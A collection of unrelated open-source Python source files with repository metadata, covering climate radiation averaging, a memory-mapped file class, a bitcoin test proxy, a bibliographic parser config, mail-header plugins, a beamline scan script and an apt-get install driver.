m_rsdscs = np.zeros([12,len(lat),len(lon)])
m_rsuscs = np.zeros([12,len(lat),len(lon)])
m_clt = np.zeros([12,len(lat),len(lon)])
for i in range(0,12):
m_rsds[i,:,:] = np.mean(rsds[i:numMonths:12,:,:], axis=0)
m_rsus[i,:,:] = np.mean(rsus[i:numMonths:12,:,:], axis=0)
m_rsut[i,:,:] = np.mean(rsut[i:numMonths:12,:,:], axis=0)
m_rsdt[i,:,:] = np.mean(rsdt[i:numMonths:12,:,:], axis=0)
m_rsutcs[i,:,:] = np.mean(rsutcs[i:numMonths:12,:,:], axis=0)
m_rsdscs[i,:,:] = np.mean(rsdscs[i:numMonths:12,:,:], axis=0)
m_rsuscs[i,:,:] = np.mean(rsuscs[i:numMonths:12,:,:], axis=0)
m_clt[i,:,:] = np.mean(clt[i:numMonths:12,:,:], axis=0)
#Calculate the overcast versions of rsds, rsus, rsut from the clear-sky and all-sky data
#First mask zero values of cloud fraction so you don't calculate overcast values in clear-sky pixels
m_clt = np.ma.masked_values(m_clt, 0)
# c = m_clt/100. #c is cloud fraction. clt was in percentages #No-Not true in CESM output
c = m_clt
m_rsdsoc = (m_rsds-(1.-c)*(m_rsdscs))/c #Can derive this algebraically from Taylor et al., 2007, Eq. 3
m_rsusoc = (m_rsus-(1.-c)*(m_rsuscs))/c
m_rsutoc = (m_rsut-(1.-c)*(m_rsutcs))/c
#Mask zero values of the downward SW radiation (I assume this means polar night, for monthly mean)
m_rsds = np.ma.masked_values(m_rsds, 0)
m_rsdscs = np.ma.masked_values(m_rsdscs, 0)
m_rsdsoc = np.ma.masked_values(m_rsdsoc, 0)
m_rsdt = np.ma.masked_values(m_rsdt, 0)
#Return dictionary with all the variables calculated here (called "dictA" because calculated in first function called)
dictA = dict()
dictA['rsds'] = m_rsds
dictA['rsus'] = m_rsus
dictA['rsut'] = m_rsut
dictA['rsdt'] = m_rsdt
dictA['rsutcs'] = m_rsutcs
dictA['rsdscs'] = m_rsdscs
dictA['rsuscs'] = m_rsuscs
dictA['clt'] = m_clt
dictA['lat'] = lat
dictA['lon'] = lon
dictA['rsdsoc'] = m_rsdsoc
dictA['rsusoc'] = m_rsusoc
dictA['rsutoc'] = m_rsutoc
dictA['c'] = c #Cloud fraction as fraction, not %
return dictA
| {
"repo_name": "rdrussotto/pyAPRP",
"path": "APRP.py",
"copies": "1",
"size": "25480",
"license": "mit",
"hash": 7492859884158293000,
"line_mean": 44.9945848375,
"line_max": 124,
"alpha_frac": 0.6364599686,
"autogenerated": false,
"ratio": 2.841530054644809,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.39779900232448084,
"avg_score": null,
"num_lines": null
} |
"""A pseudo-file mapped into memory
Provides better performance for frequent reads/writes,
and makes reading/writing easier via regions (windows)
of memory. Allows memory to be accessed via array reads/
writes as well.
"""
import mmap
import logging
log = logging.getLogger(__name__)
class ReadOnlyError(Exception):
"""The mapped file is flagged as read-only"""
def __init__(self, path):
super(ReadOnlyError, self).__init__('mapped file is flagged as read only: %s' % path)
class RegionOverflowError(Exception):
"""Data at an offset was requested but the offset was greater than the allocated size"""
def __init__(self, offset):
super(RegionOverflowError, self).__init__('region overflow offset: %d (did you allocate?)' % offset)
class Region(object):
"""A virtual region of mapped memory
This class is a 'faked' mmap() result that allows for the finer allocation of memory mappings
beyond/below what the filesystem really allows. It is backed by true mmap()'d pages and
uses magic methods to achieve the appearance of being an isolated region of memory."""
__slots__ = 'parent', 'base_offset', '__size', 'cursor'
def __init__(self, parent, base_offset, size):
self.parent = parent
self.base_offset = base_offset
self.__size = size
self.cursor = 0
def __len__(self):
return self.__size
def __str__(self):
return str(self.read(offset=0, length=len(self)))
def __enter__(self):
return self
def __exit__(self, tipo, value, traceback):
return self
def region(self, offset=-1, size=-1):
(offset, size) = self._sanitize_segment(offset, size)
return self.parent.region(self.base_offset + offset, size)
def _sanitize_segment(self, offset, length):
if offset >= len(self):
raise ValueError('offset falls outside region size')
elif offset < 0:
offset = self.cursor
if length == 0:
raise ValueError('length must be at least 1')
elif length < 0:
length = len(self) - offset
return (offset, length)
def read(self, length=-1, offset=-1, advance=True):
(offset, length) = self._sanitize_segment(offset, length)
offset += self.base_offset
result = self.parent.read(length, offset, advance=advance)
if advance:
self.cursor += len(result)
return result
def write(self, value, length=-1, offset=-1, advance=True):
if length < 0:
length = len(value)
(offset, length) = self._sanitaize_segment(offset, length)
offset += self.base_offset
result = self.parent.write(value, length, offset, advance=advance)
if advance:
self.cursor += result
return result
class MappedFile(Region):
"""Manages mmap()-ings of a file into vmem.
This class prevents virtual address space from growing too large by
re-using existing maps if the requested regions have already been mapped.
"""
def __init__(self, path, page_count, read_only=False):
# XXX TODO NOTE remove this line when write functionality is added.
read_only = True
# getting 'too many files open' error? increase the constant on the next line
# (must be an exponent of 2)
self._page_size = page_count * mmap.PAGESIZE
# make sure we're sane here - allocation granularity needs to divide into page size!
assert (self._page_size % mmap.ALLOCATIONGRANULARITY) == 0, 'page size is not a multiple of allocation granularity!'
self._file = open(path, 'r+b')
self._pages = dict()
self.read_only = read_only
self._path = path
self.cursor = 0
super(MappedFile, self).__init__(self, base_offset=0, size=len(self))
def __len__(self):
self._file.seek(0, 2)
size = self._file.tell()
return size
def __del__(self):
self.close()
def close(self):
"""Unmaps all mappings"""
for i in self._pages:
self._pages[i].close()
self._file.close()
def region(self, offset, size):
"""Requests a virtual region be 'allocated'"""
lower_page = offset - (offset % self._page_size)
upper_page = ((offset + size) // self._page_size) * self._page_size
lower_page_id = lower_page // self._page_size
upper_page_id = upper_page // self._page_size
# make sure we're mapped
for i in range(lower_page_id, upper_page_id + 1):
if i not in self._pages:
page_offset = i * self._page_size
page_size = min(self._page_size, len(self) - page_offset)
log.debug('mapping vfile page: id=%d offset=%d size=%d', i, page_offset, page_size)
self._pages[i] = mmap.mmap(self._file.fileno(), offset=page_offset, length=page_size)
# create a region
return Region(self, base_offset=offset, size=size)
def read(self, length=1, offset=-1, advance=True):
"""Reads data from the virtual region"""
(offset, length) = self._sanitize_segment(offset, length)
results = []
length = min(length, len(self))
abs_offset = offset
cur_page = abs_offset // self._page_size
abs_offset %= self._page_size
while length > 0:
readable = self._page_size - abs_offset
readable = min(readable, length)
results.append(self._pages[cur_page][abs_offset:abs_offset + readable])
length -= readable
abs_offset = 0
cur_page += 1
result = ''.join(results)
if advance:
self.cursor += len(result)
return result
def write(self, value, offset=-1, length=-1, advance=True):
if self.read_only:
raise ReadOnlyError(self._path)
# TODO
assert False, 'not implemented'
return 0
def __getitem__(self, offset):
if isinstance(offset, slice):
(start, fin, step) = offset.indices(len(self))
result = self.read(offset=start, length=fin - start)
if step not in [None, 1]:
result = result[::step]
return result
if not isinstance(offset, int):
raise TypeError('offset is not an integer: %s' % repr(offset))
if offset >= len(self):
raise RegionOverflowError(offset)
page = offset // self._page_size
rel_offset = offset % self._page_size
return self._pages[page][rel_offset]
def __setitem__(self, offset, value):
if self.read_only:
raise ReadOnlyError(self._path)
if isinstance(offset, slice):
raise ValueError('Slice assignment not supported in mapped files; assemble your data first and then write')
if not isinstance(offset, int):
raise TypeError('offset is not an integer: %s' % repr(offset))
if offset >= len(self):
raise RegionOverflowError(offset)
page = offset // self._page_size
rel_offset = offset % self._page_size
self._pages[page][rel_offset] = value
| {
"repo_name": "Qix-/starfuse",
"path": "starfuse/fs/mapped_file.py",
"copies": "1",
"size": "7231",
"license": "mit",
"hash": -2743488025018029000,
"line_mean": 32.7897196262,
"line_max": 124,
"alpha_frac": 0.5992255566,
"autogenerated": false,
"ratio": 4.076099210822999,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5175324767423,
"avg_score": null,
"num_lines": null
} |
'''A pseudo proxy for testing purposes.'''
from bitcoin.core import CBlock
import feemodel.util
from feemodel.util import load_obj
import feemodel.txmempool
from feemodel.txmempool import MemBlock
from feemodel.tests.config import blockdata, test_memblock_dbfile as dbfile
class PseudoProxy(object):
'''A pseudo proxy.
getblock and getblockhash is available for blocks 333931-333953
(the range of values in the memblock test db).
set blockcount and rawmempool to the values you want to be returned
by getblockcount or getrawmempool respectively (or equivalently,
by poll_mempool).
set on = False to simulate a connection error - raises Exception
on all method calls.
'''
def __init__(self):
self.blockcount = 0
self.rawmempool = {}
self.on = True
self._blockhashes, blocks_ser = load_obj(blockdata)
self._blocks = {}
for blockhash, block_ser in blocks_ser.items():
self._blocks[blockhash] = CBlock.deserialize(block_ser)
def getblockhash(self, blockheight):
if not self.on:
raise Exception
return self._blockhashes[blockheight]
def getblock(self, blockhash):
if not self.on:
raise Exception
return self._blocks[blockhash]
def getrawmempool(self, verbose=True):
if not self.on:
raise Exception
return self.rawmempool
def getblockcount(self):
if not self.on:
raise Exception
return self.blockcount
def poll_mempool(self):
if not self.on:
raise Exception
return self.blockcount, self.rawmempool
def set_rawmempool(self, height):
'''Set the rawmempool from test memblock with specified height.'''
b = MemBlock.read(height, dbfile=dbfile)
self.rawmempool = rawmempool_from_mementries(b.entries)
proxy = PseudoProxy()
def install():
'''Substitutes the real proxy with our pseudo one.'''
feemodel.util.proxy = proxy
feemodel.txmempool.proxy = proxy
def rawmempool_from_mementries(entries):
'''Convert mementries to rawmempool format.'''
rawmempool = {}
attrs = [
'currentpriority',
'startingpriority',
'fee',
'depends',
'height',
'size',
'time'
]
for txid, entry in entries.items():
rawentry = {}
for attr in attrs:
rawentry[attr] = getattr(entry, attr)
rawmempool[txid] = rawentry
return rawmempool
| {
"repo_name": "bitcoinfees/bitcoin-feemodel",
"path": "feemodel/tests/pseudoproxy.py",
"copies": "1",
"size": "2530",
"license": "mit",
"hash": 7439802814858999000,
"line_mean": 26.2043010753,
"line_max": 75,
"alpha_frac": 0.6411067194,
"autogenerated": false,
"ratio": 4.100486223662885,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5241592943062885,
"avg_score": null,
"num_lines": null
} |
# APS Journal dictionary: used by parsers/aps.py to get the bibstem
APS_PUBLISHER_IDS = {'PRL': 'PhRvL', 'PRX': 'PhRvX', 'RMP': 'RvMP',
'PRA': 'PhRvA', 'PRB': 'PhRvB', 'PRC': 'PhRvC',
'PRD': 'PhRvD', 'PRE': 'PhRvE', 'PRAB': 'PhRvS',
'PRSTAB': 'PhRvS', 'PRAPPLIED': 'PhRvP',
'PRFLUIDS': 'PhRvF', 'PRMATERIALS': 'PhRvM',
'PRPER': 'PRPER', 'PRSTPER': 'PRSTP', 'PR': 'PhRv',
'PRI': 'PhRvI','PHYSICS': 'PhyOJ'}
APS_ASTRO_KEYWORDS = [
'Accretion disk & black-hole plasma',
'Active & peculiar galaxies',
'Alternative gravity theories',
'Anthropic considerations',
'Asteroids, meteors, & meteorites',
'Astronomical black holes',
'Astronomical masses & mass distributions',
'Astrophysical & cosmological simulations',
'Astrophysical electromagnetic fields',
'Astrophysical fluid dynamics',
'Astrophysical jets',
'Astrophysical studies of gravity',
'Baryogenesis & leptogenesis',
'Big bang nucleosynthesis',
'Binary stars',
'Canonical quantum gravity',
'Classical black holes',
'Composition of astronomical objects',
'Cosmic microwave background',
'Cosmic ray & astroparticle detectors',
'Cosmic ray acceleration',
'Cosmic ray composition & spectra',
'Cosmic ray propagation',
'Cosmic ray sources',
'Cosmic rays & astroparticles',
'Cosmic strings & domain walls',
'Cosmological constant',
'Cosmological parameters',
'Cosmology',
'Dark energy',
'Dark matter',
'Dark matter detectors',
'Distances, redshifts, & velocities',
'Electromagnetic radiation astronomy',
'Evolution of the Universe',
'Experimental studies of gravity',
'Explosive burning',
'Extrasolar neutrino astronomy',
'Extrasolar planets',
'Fluid planets',
'Fluids & classical fields in curved spacetime',
'Formation & evolution of stars & galaxies',
'Galactic disks',
'Galactic halos',
'Galactic nuclei & quasars',
'Galaxies',
'Galaxy clusters',
'Gamma ray astronomy',
'Gamma ray bursts',
'General relativity',
'General relativity equations & solutions',
'General relativity formalism',
'Gravitation',
'Gravitational lenses',
'Gravitational wave detection',
'Gravitational wave detectors',
'Gravitational wave sources',
'Gravitational waves',
'Gravity in dimensions other than four',
'H & He burning',
'Hydrostatic stellar nucleosynthesis',
'Inflation',
'Intergalactic medium',
'Interplanetary magnetic field',
'Interstellar medium',
'Laboratory studies of gravity',
'Laboratory studies of space & astrophysical plasmas',
'Large scale structure of the Universe',
'Loop quantum gravity',
'Massive compact halo objects',
'Milky Way',
'Neutrino detectors',
'Neutron stars & pulsars',
'Normal galaxies',
'Normal stars',
'Novae & supernovae',
'Nuclear astrophysics',
'Nuclear physics of explosive environments',
'Nucleosynthesis in explosive environments',
'Numerical relativity',
'Numerical simulations in gravitation & astrophysics',
'Optical, UV, & IR astronomy',
'Particle astrophysics',
'Particle dark matter',
'Planetary satellites & rings',
'Planets & planetary systems',
'Pre-main-sequence stars',
'Primordial magnetic fields',
'Quantum aspects of black holes',
'Quantum cosmology',
'Quantum fields in curved spacetime',
'Quantum gravity',
'Radio, microwave, & sub-mm astronomy',
'Relativistic aspects of cosmology',
'Singularities In general relativity',
'Sky surveys',
'Solar neutrinos',
'Solar system & its planets',
'Solid-surface planets',
'Space & astrophysical plasma',
'Space charge in beams',
'Space science',
'Space weather',
'Spacetime symmetries',
'Spacetime topology & causal structure',
'Stars',
'Stellar plasmas',
'Sun',
'Supergravity',
'Supernova remnants',
'Telescopes',
'Transient & explosive astronomical phenomena',
'Unruh effect',
'Variable & peculiar stars',
'X ray astronomy',
'X ray bursts',
'r process',
's process'
]
JATS_TAGS_DANGER = ['php','script','css']
JATS_TAGS_MATH = ['inline-formula',
'mml:math',
'mml:semantics',
'mml:mrow',
'mml:munder',
'mml:mo',
'mml:mi',
'mml:msub',
'mml:mover',
'mml:mn',
'mml:annotation'
]
JATS_TAGS_HTML = ['sub','sup','a','astrobj']
JATS_TAGSET = {'title':JATS_TAGS_MATH + JATS_TAGS_HTML,
'abstract':JATS_TAGS_MATH + JATS_TAGS_HTML + ['pre','br'],
'comments':JATS_TAGS_MATH + JATS_TAGS_HTML + ['pre','br'],
'affiliations':['email','orcid'],
'keywords':['astrobj']
}
| {
"repo_name": "adsabs/parsers",
"path": "pyingest/config/config.py",
"copies": "1",
"size": "5915",
"license": "mit",
"hash": 4724038807153585000,
"line_mean": 37.4090909091,
"line_max": 72,
"alpha_frac": 0.5180050719,
"autogenerated": false,
"ratio": 3.7484157160963245,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.47664207879963244,
"avg_score": null,
"num_lines": null
} |
__aps__ = {
'api': '1.0.0',
'version': '1.0',
'uri': None,
'urimatrix': None
}
import re
import sys
try:
import agn
except:
sys.path.append('/home/openemm/bin/scripts/')
import agn
def handleOutgoingMail(ctx, mail):
precedence = __aps__['precedence']
if precedence:
found = None
for line in mail.head:
if line.lower().startswith('precedence'):
found = line
break
if found is None:
mail.head.append('Precedence: %s' % precedence)
domain = mail.sender.rsplit('@', 1)[1]
re_str = r"Message-ID: <(?P<uidstr>.*)@.*>"
reg = re.compile(re_str)
uidstr = None
uid = None
for header in mail.head:
if header.lower().startswith('message-id:'):
# print header
m = reg.search(header)
uidstr = m.group("uidstr")
break
if not uidstr is None:
uid = agn.UID()
try:
uid.parseUID(uidstr)
except Exception as ex:
print ex
xjob = __aps__['x-job']
if not uid is None and xjob:
if uid.mailingID > 0:
mail.head.append('X-job: ' + xjob % str(uid.mailingID))
listid = __aps__['list-id']
if not uid is None and listid:
if uid.mailingID > 0:
mail.head.append('List-ID: ' + listid % (
str(uid.companyID), domain))
abusereports = __aps__['abuse-reports-to']
if abusereports:
mail.head.append(
'X-Abuse-Reports-To: ' + abusereports % domain)
urimatrix = __aps__['urimatrix']
uri = __aps__['uri']
if urimatrix or uri:
found = None
mid = None
for line in mail.head:
if line.lower().startswith('list-unsubscribe:'):
found = line
elif line.lower().startswith('message-id:'):
m = re.search(
'Message-ID: <(?P<mid>.*)@.*>', line)
mid = m.group(1)
if found is None:
try:
from urllib2 import quote
except ImportError:
from urllib import quote
data = {
'sender': mail.sender,
'urlsender': quote(mail.sender),
'recv': mail.receiver,
'urlrecv': quote(mail.receiver),
'mid': mid
}
isInMatrix = False
if urimatrix and not mid is None:
sDomain = mail.sender.rsplit('@', 1)[1]
for cline in urimatrix.split('\n'):
if cline.startswith(sDomain + '|'):
mail.head.append('List-Unsubscribe: <%s>, <%s>' % (
cline.split('|')[1] % data, cline.split('|')[2] % data, ))
isInMatrix = True
break
if uri and not isInMatrix:
mail.head.append(
'List-Unsubscribe: <%s>' % (uri % data, ))
if __name__ == '__main__':
def _main():
class struct:
pass
mail = struct()
mail.head = []
mail.head.append(
'Message-ID: <20130823020049-1.1.h.b.0.pp89lw4y80@news.gnlv.fr>')
mail.sender = 'news@toto.com'
mail.receiver = 'someone@somewhere.com'
__aps__['precedence'] = 'bulk'
__aps__['x-job'] = '%s'
__aps__['list-id'] = '<%s.%s>'
__aps__['abuse-reports-to'] = '<abuse@%s>'
handleOutgoingMail(None, mail)
print mail.head[0]
print mail.head[1]
print mail.head[2]
print mail.head[3]
print mail.head[4]
mail.head = []
__aps__['uri'] = 'http://localhost/unsubscribe?%(urlrecv)s'
handleOutgoingMail(None, mail)
print mail.head[0]
mail.head = []
__aps__['urimatrix'] = 'news.example.com|mailto:DUN-%(urlrecv)s@lu.example.com|http://news.example.com?%(urlrecv)s\nletter.com|mailto:ext-%(urlrecv)s@localhost|http://localhost?%(urlrecv)s'
handleOutgoingMail(None, mail)
_main()
| {
"repo_name": "AntonOfTheWoods/openemm-patches",
"path": "full_domain_personalisation/script/process/semu/headerManager.py",
"copies": "1",
"size": "5151",
"license": "mit",
"hash": -4554935613438596600,
"line_mean": 38.320610687,
"line_max": 205,
"alpha_frac": 0.3915744516,
"autogenerated": false,
"ratio": 4.611459265890779,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5503033717490778,
"avg_score": null,
"num_lines": null
} |
__aps__ = {
'api': '1.0.0',
'version': '1.0',
'uri': None,
'urimatrix': None
}
import re
#
def handleOutgoingMail(ctx, mail):
urimatrix = __aps__['urimatrix']
uri = __aps__['uri']
if urimatrix or uri:
found = None
mid = None
for line in mail.head:
if line.lower().startswith('list-unsubscribe:'):
found = line
elif line.lower().startswith('message-id:'):
m = re.search(
'Message-ID: <(?P<mid>.*)@.*>', line)
mid = m.group(1)
if found is None:
try:
from urllib2 import quote
except ImportError:
from urllib import quote
data = {
'sender': mail.sender,
'urlsender': quote(mail.sender),
'recv': mail.receiver,
'urlrecv': quote(mail.receiver),
'mid': mid
}
isInMatrix = False
if urimatrix and not mid is None:
sDomain = mail.sender.rsplit('@', 1)[1]
for cline in urimatrix.split('\n'):
if cline.startswith(sDomain + '|'):
mail.head.append('List-Unsubscribe: <%s>, <%s>' % (
cline.split('|')[1] % data, cline.split('|')[2] % data, ))
isInMatrix = True
break
if uri and not isInMatrix:
mail.head.append(
'List-Unsubscribe: <%s>' % (uri % data, ))
if __name__ == '__main__':
def _main():
class struct:
pass
mail = struct()
mail.head = []
mail.sender = 'news@toto.com'
mail.receiver = 'someone@somewhere.com'
__aps__['uri'] = 'http://localhost/unsubscribe?%(urlrecv)s'
handleOutgoingMail(None, mail)
print mail.head[0]
mail.head = []
__aps__['urimatrix'] = 'news.example.com|mailto:DUN-%(urlrecv)s@lu.example.com|http://news.example.com?%(urlrecv)s\nletter.com|mailto:ext-%(urlrecv)s@localhost|http://localhost?%(urlrecv)s'
handleOutgoingMail(None, mail)
print mail.head[0]
_main()
| {
"repo_name": "AntonOfTheWoods/openemm-patches",
"path": "full_domain_personalisation/script/process/semu/listUnsubscribeHeader.py",
"copies": "1",
"size": "2875",
"license": "mit",
"hash": -1808768738562226200,
"line_mean": 41.9104477612,
"line_max": 205,
"alpha_frac": 0.3669565217,
"autogenerated": false,
"ratio": 4.991319444444445,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0064928010867825355,
"num_lines": 67
} |
#!/APSshare/epd/rh5-x86/bin/python
'''
This is for X-piezo scan (stage coordinates) and Y-combined (stage coordinates) batch flyscan with different sample_Z postions.
The max scan width in X direction is 80 um.
'''
import epics
from epics import caput, caget
from epics import PV
import time
import numpy as np
import pdb
'''
please enter the scan prameters below:
scans [x-center(um) y-center.(um), z-position (um), x-width.(um), y-width.(um), x-stepsize.(um), Y-stepsize.(um), dwell.(ms)]
'''
caput('9idbTAU:SM:Ps:xyDiffMotion.VAL', 1)
scans = [[482.3,-2131.6,247.5,10,10,0.02,0.02,50],
[482.3,-2131.6,247.5,10,10,0.02,0.02,50],
[482.3,-2131.6,247.5,12,12,0.02,0.02,50]
]
# add some lines to check the beam alignment
pvs = ['9idbTAU:SM:PX:RqsPos', '9idbTAU:SY:PY:RqsPos', '9idbTAU:SM:SZ:RqsPos', '9idbBNP:scan1.P1WD', '9idbBNP:scan2.P1WD', '9idbBNP:scan1.P1SI', '9idbBNP:scan2.P1SI', '9idbBNP:scanTran3.C PP']
sm_px_RqsPos=PV('9idbTAU:SM:PX:RqsPos')
sm_px_ActPos=PV('9idbTAU:SM:PX:ActPos')
sm_py_RqsPos=PV('9idbTAU:SY:PY:RqsPos')
sm_py_ActPos=PV('9idbTAU:SY:PY:ActPos')
print 'Batchscan starts'
for batch_num, scan in enumerate(scans):
#pdb.set_trace()
print 'changing XY scan mode to combined motion'
caput('9idbTAU:SM:Ps:xMotionChoice.VAL', 0) #0: Stepper+piezo, 1: stepper only, 2: piezo only
time.sleep(2.)
caput('9idbTAU:SY:Ps:yMotionChoice.VAL', 0)
time.sleep(2.)
#print 'scan #{0:d} starts'.format(batch_num)
print 'entering scan parameters for scan #{0:d}'.format(batch_num+1)
for i, pvs1 in enumerate(pvs):
#print 'Setting %s' %pvs1
caput(pvs1, scans[batch_num][i])
time.sleep(1.)
# check whether the motors have moved to the requested position
print 'checking whether motors are in position'
ready=abs(sm_px_ActPos.get()-sm_px_RqsPos.get())<0.1 and abs(sm_py_ActPos.get()-sm_py_RqsPos.get())<0.1
while not ready:
print '\t Motors are not ready'
sm_px_RqsPos.put(sm_px_RqsPos.get())
sm_py_RqsPos.put(sm_py_RqsPos.get())
time.sleep(3.)
ready=abs(sm_px_ActPos.get()-sm_px_RqsPos.get())<0.1 and abs(sm_py_ActPos.get()-sm_py_RqsPos.get())<0.1
print '\t Motors are ready now!'
print 'setting the current position as the center of the scan'
caput('9idbBNP:aoRecord11.PROC', 1)
time.sleep(3.)
caput('9idbBNP:aoRecord12.PROC', 1)
time.sleep(3.)
print 'changing X scan mode to Piezo only'
caput('9idbTAU:SM:Ps:xMotionChoice.VAL', 2)
time.sleep(3.)
print 'centering piezoX and piezoY'
caput('9idbTAU:SM:Ps:xCenter.PROC', 1)
time.sleep(3.)
caput('9idbTAU:SY:Ps:yCenter.PROC', 1)
time.sleep(3.)
caput('9idbTAU:SM:Ps:xCenter.PROC', 1)
time.sleep(3.)
caput('9idbTAU:SY:Ps:yCenter.PROC', 1)
time.sleep(3.)
caput('9idbBNP:scan2.EXSC', 1)
time.sleep(1.)
done = False
print 'Checking every 10 sec for scan to complete'
while not done:
done = caget('9idbBNP:scan2.EXSC')==0
print '\t Batch {0:d}/{1:d} scan is ongoging'.format(batch_num+1,len(scans))
time.sleep(10.)
print 'Completeted. Congratulations!'
caput('9idbTAU:SM:Ps:xMotionChoice.VAL', 0)
caput('9idbTAU:SM:Ps:xyDiffMotion.VAL', 0)
raw_input("Press Enter to exit")
| {
"repo_name": "tomography/scanscripts",
"path": "aps_21id/201702_BNP_batch_flyscan_with_z.py",
"copies": "1",
"size": "3256",
"license": "bsd-3-clause",
"hash": -3166853593587177000,
"line_mean": 31.56,
"line_max": 192,
"alpha_frac": 0.6667690418,
"autogenerated": false,
"ratio": 2.3424460431654675,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.35092150849654674,
"avg_score": null,
"num_lines": null
} |
"""aptget -- utility functions to run apt-get (ubuntu/debian package manager),
along with a generic resource manager for apt packages"""
import os
import os.path
import sys
import re
import copy
import engage.drivers.resource_manager as resource_manager
import engage.drivers.resource_metadata as resource_metadata
import engage_utils.process as iuprocess
import engage.utils.log_setup
from engage.drivers.password_repo_mixin import PasswordRepoMixin
from engage.drivers.action import Action, _check_file_exists, make_value_action, make_action
from engage.utils.file import NamedTempFile
import engage_utils.pkgmgr
logger = engage.utils.log_setup.setup_script_logger(__name__)
from engage.utils.user_error import ScriptErrInf, UserError, convert_exc_to_user_error
import gettext
_ = gettext.gettext
errors = { }
def define_error(error_code, msg):
global errors
error_info = ScriptErrInf(__name__, error_code, msg)
errors[error_info.error_code] = error_info
# error codes
ERR_APT_GET_NOT_FOUND = 1
ERR_APT_GET_INSTALL = 2
ERR_DPKG_QUERY_NOT_FOUND = 3
ERR_INSTALL_PKG_QUERY = 4
ERR_PKG_NOT_INSTALLED = 5
ERR_DPKG_NOT_FOUND = 6
ERR_PKG_FILE_NOT_FOUND = 7
ERR_DPKG_INSTALL = 8
define_error(ERR_APT_GET_NOT_FOUND,
_("apt-get executable not found at %(path)s"))
define_error(ERR_APT_GET_INSTALL,
_("apt-get install failed for packages %(pkgs)s"))
define_error(ERR_DPKG_QUERY_NOT_FOUND,
_("dpkg-query executable not found at %(path)s"))
define_error(ERR_INSTALL_PKG_QUERY,
_("dpkg-query for installed package %(pkg)s failed."))
define_error(ERR_PKG_NOT_INSTALLED,
_("aptget package %(pkg)s not found after install in resource %(id)s"))
define_error(ERR_DPKG_NOT_FOUND,
_("dpkg executable not found at %(path)s"))
define_error(ERR_PKG_FILE_NOT_FOUND,
_("package file not found at %(path)s"))
define_error(ERR_DPKG_INSTALL,
_("dpkg install failed for package file %(path)s"))
APT_GET_PATH = "/usr/bin/apt-get"
DPKG_QUERY_PATH = "/usr/bin/dpkg-query"
DPKG_PATH = "/usr/bin/dpkg"
def _get_env_for_aptget():
"""The apt-get utility may in some cases require that the PATH environment
variable be set. We take the current environment and then add a resonable
default path if one is not already present.
"""
env = copy.deepcopy(os.environ)
if not env.has_key("PATH"):
env["PATH"] = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
return env
# We track whether this execution of Engage has run the apt-get update command.
# If so, we don't run it for any subsequent requests. The update command is
# slow and frequently fails due to server availability issues.
update_run_this_execution = False
def run_update_if_not_already_run(sudo_password, env):
global update_run_this_execution
if not update_run_this_execution:
logger.info("Running apt-get update...")
iuprocess.run_sudo_program([APT_GET_PATH, "-q", "-y", "update"], sudo_password,
logger, env=env)
update_run_this_execution=True
def apt_get_install(package_list, sudo_password):
env = _get_env_for_aptget()
if not os.path.exists(APT_GET_PATH):
raise UserError(errors[ERR_APT_GET_NOT_FOUND],
msg_args={"path":APT_GET_PATH})
try:
run_update_if_not_already_run(sudo_password, env)
iuprocess.run_sudo_program([APT_GET_PATH, "-q", "-y", "install"]+package_list, sudo_password,
logger,
env=env)
except iuprocess.SudoError, e:
exc_info = sys.exc_info()
sys.exc_clear()
raise convert_exc_to_user_error(exc_info, errors[ERR_APT_GET_INSTALL],
msg_args={"pkgs":package_list.__repr__()},
nested_exc_info=e.get_nested_exc_info())
def dpkg_install(package_file, sudo_password, may_have_dependencies=True):
"""Given a package's .deb file, install using dpkg. may_have_dependencies should
be left at True if it is possible that the .deb package has dependencies that aren't
being managed by Engage. In this case, it will run an apt-get update to make
sure the package database is up-to-date. If you know that you don't have dependencies,
set this to False to suppress the apt-get update call, which can fail due
to remote servers being temporarily unavailable.
"""
env = _get_env_for_aptget()
if not os.path.exists(DPKG_PATH):
raise UserError(errors[ERR_DPKG_NOT_FOUND],
msg_args={"path":DPKG_PATH})
if not os.path.exists(package_file):
raise UserError(errors[ERR_PKG_FILE_NOT_FOUND],
msg_args={"path":package_file})
try:
if may_have_dependencies:
run_update_if_not_already_run(sudo_password, env)
iuprocess.run_sudo_program([DPKG_PATH, "-i", package_file], sudo_password,
logger, env=env)
except iuprocess.SudoError, e:
exc_info = sys.exc_info()
sys.exc_clear()
raise convert_exc_to_user_error(exc_info, errors[ERR_DPKG_INSTALL],
msg_args={"path":package_file},
nested_exc_info=e.get_nested_exc_info())
class install(Action):
"""An action to install a list of packages via apt-get"""
NAME="aptget.install"
def __init__(self, ctx):
super(install, self).__init__(ctx)
def run(self, package_list):
apt_get_install(package_list, self.ctx._get_sudo_password(self))
def dry_run(self, package_list):
_check_file_exists(APT_GET_PATH, self)
class debconf_set_selections(Action):
"""Run the debconf-set-selections utility. This can be used to set values
that normally are prompted interactively from the user in apt-get.
"""
NAME="aptget.debconf_set_selections"
def run(self, selection_lines):
with NamedTempFile(selection_lines) as f:
iuprocess.run_sudo_program(["/usr/bin/debconf-set-selections",
f.name],
self.ctx._get_sudo_password(self),
self.ctx.logger,
cwd="/usr/bin")
def dry_run(self, selection_lines):
pass
def format_action_args(self, selection_lines):
return "%s <selection_lines>" % self.NAME
@make_action
def update(self, always_run=True):
"""ACTION: Run the apt-get update command to update the list of available
packages. By default always run the update command, even if it was already
run, as it is assumed that an explicit call readlly needs the update. This
is the case for add_apt_repository, where subsequent packages won't
even be visible.
"""
global update_run_this_execution
if always_run or (not update_run_this_execution):
self.ctx.logger.info("Running apt-get update...")
iuprocess.run_sudo_program([APT_GET_PATH, "-q", "-y", "update"],
self.ctx._get_sudo_password(self),
self.ctx.logger,
env=_get_env_for_aptget())
update_run_this_execution = True
else:
self.ctx.logger.info("ignoring request for apt-get update, as update was already run")
def is_installed(package):
if not os.path.exists(DPKG_QUERY_PATH):
raise UserError(errors[ERR_DPKG_QUERY_NOT_FOUND],
msg_args={"path":DPKG_QUERY_PATH})
